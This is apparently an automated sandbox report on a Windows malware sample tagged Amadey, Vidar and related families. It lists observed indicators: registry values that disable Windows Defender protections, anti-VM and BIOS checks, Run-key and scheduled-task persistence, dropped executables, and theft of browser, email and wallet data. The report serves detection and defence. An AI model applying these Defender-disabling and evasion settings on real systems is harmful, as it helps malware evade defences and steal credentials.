Malware Analysis Report

2025-04-03 09:35

Sample ID 250224-qnckkavks4
Target 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
Tags
amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2

Threat Level: Known bad

The file 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 was found to be: Known bad.

Malicious Activity Summary

Healer family

Amadey

Healer

Detects Healer an antivirus disabler dropper

Gcleaner family

Modifies Windows Defender notification settings

Amadey family

Modifies Windows Defender Real-time Protection settings

Systembc family

Vidar family

SystemBC

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender TamperProtection settings

Detect Vidar Stealer

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Uses browser remote debugging

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Identifies Wine through registry keys

Checks BIOS information in registry

Reads data files stored by FTP clients

Windows security modification

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Kills process with taskkill

Checks processor information in registry

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Delays execution with timeout.exe

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-24 13:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 13:24

Reported

2025-02-24 13:26

Platform

win7-20240903-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\omlnpw\uxek.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\omlnpw\uxek.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\omlnpw\uxek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f87af9d1cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\f87af9d1cb.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
